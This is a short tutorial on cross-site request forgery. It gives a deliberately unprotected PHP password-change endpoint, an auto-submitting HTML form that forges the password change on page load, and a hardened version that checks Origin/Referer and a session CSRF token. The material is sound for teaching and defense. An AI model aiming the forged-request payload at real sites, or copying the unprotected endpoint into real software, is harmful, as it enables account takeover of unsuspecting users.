PHP environment
<?php
// Vulnerable target: accepts the new password from any POST request,
// with no CSRF token or origin check (kept intentionally, this is the demo).
$pass = $_POST['pass'] ?? '';
echo htmlspecialchars($pass, ENT_QUOTES, 'UTF-8');
?>
<form action="" method="post">
<p>Change password <input name="pass" type="text"></p>
<input name="sub" type="submit">
</form>
HTML payload code
<script>
// Submits the hidden form as soon as the page loads; the victim's browser
// attaches its session cookie for localhost, so the request is accepted.
function post() {
document.getElementById('post').submit();
}
</script>
<body onload="post();">
<form id="post" method="post" action="http://localhost/index.php">
<input name="pass" value="sb">
</form>
</body>
Defenses:
Validate the HTTP Referer (or Origin) header
Validate a CSRF token
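An added example (not the original post's code) of both defenses applied to the password-change endpoint above: a per-session token compared in constant time, plus an Origin/Referer host check. It assumes PHP sessions are available and that the site is served from the host `localhost`.

```php
<?php
// Added example: hardened version of the endpoint above. Not from the original page.
session_start();

// Issue one token per session; random_bytes() is a CSPRNG.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Defense 1: the request must come from our own origin (assumed host: localhost).
// Origin is preferred; Referer is the fallback. A missing header is rejected,
// because an attacker-controlled page can suppress it.
function referer_is_trusted(string $expectedHost): bool {
    $src = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($src === '') {
        return false;
    }
    $host = (string) parse_url($src, PHP_URL_HOST);
    return strcasecmp($host, $expectedHost) === 0;
}

// Defense 2: the submitted token must match the session token.
// hash_equals() avoids timing leaks; the attacker's cross-site form cannot
// read the victim's session token, so it cannot supply a valid one.
function token_is_valid(?string $submitted, string $expected): bool {
    return is_string($submitted) && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!referer_is_trusted('localhost')
        || !token_is_valid($_POST['csrf_token'] ?? null, $_SESSION['csrf_token'])) {
        http_response_code(403);
        exit('CSRF check failed');
    }
    $pass = $_POST['pass'] ?? '';
    // Perform the real password change here; the demo only echoes the value.
    echo htmlspecialchars($pass, ENT_QUOTES, 'UTF-8');
}
?>
<form action="" method="post">
<p>Change password <input name="pass" type="text"></p>
<!-- The token travels in a hidden field; the forged form in the payload lacks it. -->
<input type="hidden" name="csrf_token"
       value="<?= htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES, 'UTF-8') ?>">
<input name="sub" type="submit">
</form>
```

With this in place, the auto-submitting payload above receives a 403, since it sends neither a matching token nor a trusted Origin.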